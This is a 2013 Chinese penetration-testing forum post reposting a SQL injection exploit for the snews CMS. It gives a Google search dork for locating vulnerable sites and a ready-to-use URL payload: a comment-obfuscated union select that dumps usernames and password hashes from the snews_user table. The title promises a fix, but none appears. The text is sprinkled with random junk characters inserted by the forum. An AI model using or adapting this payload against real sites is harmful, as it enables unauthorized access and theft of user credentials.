中国网络渗透测试联盟

标题: CMS snews SQL注射及修复 [打印本页]
作者: admin    时间: 2013-1-23 08:55
标题: CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability6 e! S3 a2 v, u) ~* W2 F
作者: By onestree
: t1 i! p% `) q. Z下载地址 : http://snewscms.com/
" e* j$ X: E! }7 q测试平台 : ubuntu 12.10 / win 7
' F, T2 B8 G8 `( {: [: R0 n关键词: inurl:"tanyakan pada rumput yang bergoyang": F2 x& b5 J# G3 i
# @9 O# l5 k* I5 f
. j* x" v% d- a( u
*************************************************************
( b, @  F3 D* F, m
! s7 b! S4 K; ?4 WSQL poc:1 j1 V1 c2 |+ S5 }$ D/ E
  C8 N+ D# \# \& S
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]. w: }+ h* a, E( B& o% \/ j/ P
# C: ]% c" i/ ]; P
示例; O& x. C, K$ L, A
+ E' w! m- Y! j% _, W1 q0 Q
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
& h  c  [4 Z, U8 A* t
# {6 F# J) n0 ^/ p" h; I7 Z+ ~
, c% n9 y# }1 B  e. k( J1 F致谢:
. M( A/ m  l/ c1 H . ?1 a$ R2 h# k* v7 O2 d+ i
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell$ g8 ~9 q4 l  j
     " |* ]: C/ A7 g5 ~" c9 S0 q# e' Q
          indonesiancoder - moeslimh4x0r - go-coder
5 d* l6 I8 p3 u3 I8 ~. U6 U 6 |7 i! W1 X8 p9 {
spesial my hunny :*) W% b" \( n& e2 H2 \2 Z0 G




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2